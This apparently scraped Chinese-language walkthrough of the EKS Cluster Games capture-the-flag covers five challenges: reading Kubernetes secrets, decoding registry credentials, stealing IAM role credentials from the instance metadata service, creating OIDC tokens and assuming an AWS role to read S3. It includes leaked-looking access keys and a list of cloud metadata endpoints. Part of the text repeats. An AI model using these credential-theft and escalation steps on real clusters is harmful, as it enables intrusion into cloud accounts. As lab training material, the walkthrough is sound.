云原生安全之EKS CLUSTER GAMES实战教学<\/h1>

1. AWS EKS基础概念<\/h2>

EKS (Elastic Kubernetes Service)<\/strong> 是AWS提供的托管Kubernetes服务，简化了在AWS云环境中运行Kubernetes的过程。<\/p>

核心组件<\/strong>:<\/p>

Pod<\/strong>: Kubernetes集群的基本执行单元，可包含一个或多个容器<\/li>
Secrets<\/strong>: 用于存储敏感数据(密码、OAuth令牌、SSH密钥等)的对象<\/li> <\/ul>
2. Challenge 1: 获取Secrets中的Flag<\/h2>
目标<\/strong>: 列出集群中所有secrets并找到flag<\/p>
操作步骤<\/strong>:<\/p>
# 列出所有secrets<\/span> <\/span><\/span>kubectl get secrets -o yaml <\/span><\/span> <\/span><\/span># 或查看特定secret<\/span> <\/span><\/span>kubectl get secrets log-rotate -o yaml <\/span><\/span><\/code><\/pre>关键点<\/strong>:<\/p> -o yaml<\/code> 参数以YAML格式输出，便于阅读<\/li> 需要具备secrets的get和list权限<\/li> <\/ul> 3. Challenge 2: 检查Container Registries<\/h2> 目标<\/strong>: 通过imagePullSecrets获取私有仓库凭证<\/p> 操作步骤<\/strong>:<\/p> 查看pods配置:<\/li> <\/ol> kubectl get pods -o yaml <\/span><\/span><\/code><\/pre> 查找imagePullSecrets字段<\/li> 获取对应的secret:<\/li> <\/ol> kubectl get secrets registry-pull-secrets-780bab1d -o yaml <\/span><\/span><\/code><\/pre> 解码dockerconfigjson的auth字段:<\/li> <\/ol> echo "base64编码字符串"<\/span> | base64 -d <\/span><\/span><\/code><\/pre> 使用crane登录Docker Hub:<\/li> <\/ol> crane auth login index.docker.io -u 用户名 -p 密码 <\/span><\/span><\/code><\/pre> 读取配置获取flag:<\/li> <\/ol> crane config base_ext_image | jq <\/span><\/span><\/code><\/pre>关键点<\/strong>:<\/p> imagePullSecrets用于拉取私有容器镜像的认证<\/li> crane工具用于管理容器镜像<\/li> <\/ul> 4. Challenge 3: 检查ECR镜像层<\/h2> 目标<\/strong>: 获取ECR凭证并检查镜像层中的秘密<\/p> 操作步骤<\/strong>:<\/p> 获取EC2实例元数据:<\/li> <\/ol> curl http:\/\/169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/eks-challenge-cluster-nodegroup-NodeInstanceRole | jq <\/span><\/span><\/code><\/pre> 设置AWS凭证环境变量:<\/li> <\/ol> export AWS_ACCESS_KEY_ID=<\/span>ASIA2AVYNEVM6EK2U6GS <\/span><\/span>export AWS_SECRET_ACCESS_KEY=<\/span>\/oE7RUuRIldHrxfk8uPHD+7\/gPKZVesTvQcANHQG <\/span><\/span>export AWS_SESSION_TOKEN=<\/span>FwoGZXIvYXdzEK... <\/span><\/span><\/code><\/pre> 获取ECR登录密码并登录:<\/li> <\/ol> aws ecr get-login-password | crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS --password-stdin <\/span><\/span><\/code><\/pre> 读取配置获取flag:<\/li> <\/ol> crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com\/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 | jq <\/span><\/span><\/code><\/pre>关键点<\/strong>:<\/p> 169.254.169.254是AWS元数据服务地址<\/li> 通过实例IAM角色获取临时凭证<\/li> <\/ul> 5. Challenge 4: 提升到节点服务账户<\/h2> 目标<\/strong>: 从受限pod访问EKS节点的权限服务账户<\/p> 操作步骤<\/strong>:<\/p> 检查当前身份:<\/li> <\/ol> aws sts get-caller-identity <\/span><\/span><\/code><\/pre> 获取EKS集群token:<\/li> <\/ol> aws eks get-token --cluster-name eks-challenge-cluster <\/span><\/span><\/code><\/pre> 创建具有OIDC权限的token:<\/li> <\/ol> kubectl create token debug-sa --audience sts.amazonaws.com --token=<\/span>"ey..."<\/span> <\/span><\/span><\/code><\/pre> 使用token获取secrets:<\/li> <\/ol> kubectl get secrets -o yaml --token=<\/span>"ey..."<\/span> <\/span><\/span><\/code><\/pre>关键点<\/strong>:<\/p> 必须指定--audience sts.amazonaws.com<\/code>参数<\/li> 通过OIDC实现身份验证<\/li> <\/ul> 6. Challenge 5: 从EKS迁移到AWS账户<\/h2> 目标<\/strong>: 获取s3access-sa服务账户的AWS角色并读取S3中的flag<\/p> 操作步骤<\/strong>:<\/p> 获取EKS集群token:<\/li> <\/ol> aws eks get-token --cluster-name eks-challenge-cluster <\/span><\/span><\/code><\/pre> 创建OIDC token:<\/li> <\/ol> kubectl create token debug-sa --audience sts.amazonaws.com --token=<\/span>"ey..."<\/span> <\/span><\/span><\/code><\/pre> 使用token获取AWS角色凭证:<\/li> <\/ol> aws sts assume-role-with-web-identity \ <\/span><\/span><\/span><\/span> --role-arn arn:aws:iam::688655246681:role\/challengeEksS3Role \ <\/span><\/span><\/span><\/span> --role-session-name payload \ <\/span><\/span><\/span><\/span> --web-identity-token ey... <\/span><\/span><\/code><\/pre> 设置环境变量:<\/li> <\/ol> export AWS_ACCESS_KEY_ID=<\/span>ASIA2AVYNEVMYUPBUWGM <\/span><\/span>export AWS_SECRET_ACCESS_KEY=<\/span>lUFmyh0PxgngR6vxQflDz8KhkmUpgqGRbjew4XbN <\/span><\/span>export AWS_SESSION_TOKEN=<\/span>IQoJb3JpZ2luX2VjEJ... <\/span><\/span><\/code><\/pre> 读取S3中的flag:<\/li> <\/ol> aws s3 cp s3:\/\/challenge-flag-bucket-3ff1ae2\/flag - | cat <\/span><\/span><\/code><\/pre>关键点<\/strong>:<\/p> 通过web identity token获取临时凭证<\/li> S3存储桶访问需要正确权限<\/li> <\/ul> 7. 公有云元数据服务地址汇总<\/h2> 云服务商<\/th> 元数据地址<\/th> <\/tr> <\/thead> AWS<\/td> http:\/\/instance-data, http:\/\/169.254.169.254<\/td> <\/tr> Google Cloud<\/td> http:\/\/169.254.169.254, http:\/\/metadata.google.internal<\/td> <\/tr> Azure<\/td> http:\/\/169.254.169.254<\/td> <\/tr> Digital Ocean<\/td> http:\/\/169.254.169.254<\/td> <\/tr> Alibaba Cloud<\/td> http:\/\/100.100.100.200<\/td> <\/tr> Tencent Cloud<\/td> http:\/\/metadata.tencentyun.com<\/td> <\/tr> <\/tbody> <\/table> 8. 安全总结<\/h2> Secrets管理<\/strong>: 确保敏感信息存储在secrets中而非配置文件中<\/li> 权限控制<\/strong>: 遵循最小权限原则，限制pod和服务账户的权限<\/li> 镜像安全<\/strong>: 检查容器镜像层中可能隐藏的敏感信息<\/li> 元数据保护<\/strong>: 限制对云服务元数据API的访问<\/li> OIDC集成<\/strong>: 使用OIDC实现安全的身份验证和授权<\/li> <\/ol> 通过这系列挑战，我们学习了从基础的secrets获取到复杂的权限提升和跨服务访问的完整云原生安全攻防技术。<\/p>

云服务商<\/th>	元数据地址<\/th> <\/tr> <\/thead>
AWS<\/td>	http:\/\/instance-data, http:\/\/169.254.169.254<\/td> <\/tr>
Google Cloud<\/td>	http:\/\/169.254.169.254, http:\/\/metadata.google.internal<\/td> <\/tr>
Azure<\/td>	http:\/\/169.254.169.254<\/td> <\/tr>
Digital Ocean<\/td>	http:\/\/169.254.169.254<\/td> <\/tr>
Alibaba Cloud<\/td>	http:\/\/100.100.100.200<\/td> <\/tr>
Tencent Cloud<\/td>	http:\/\/metadata.tencentyun.com<\/td> <\/tr> <\/tbody> <\/table> 8. 安全总结<\/h2> Secrets管理<\/strong>: 确保敏感信息存储在secrets中而非配置文件中<\/li> 权限控制<\/strong>: 遵循最小权限原则，限制pod和服务账户的权限<\/li> 镜像安全<\/strong>: 检查容器镜像层中可能隐藏的敏感信息<\/li> 元数据保护<\/strong>: 限制对云服务元数据API的访问<\/li> OIDC集成<\/strong>: 使用OIDC实现安全的身份验证和授权<\/li> <\/ol> 通过这系列挑战，我们学习了从基础的secrets获取到复杂的权限提升和跨服务访问的完整云原生安全攻防技术。<\/p>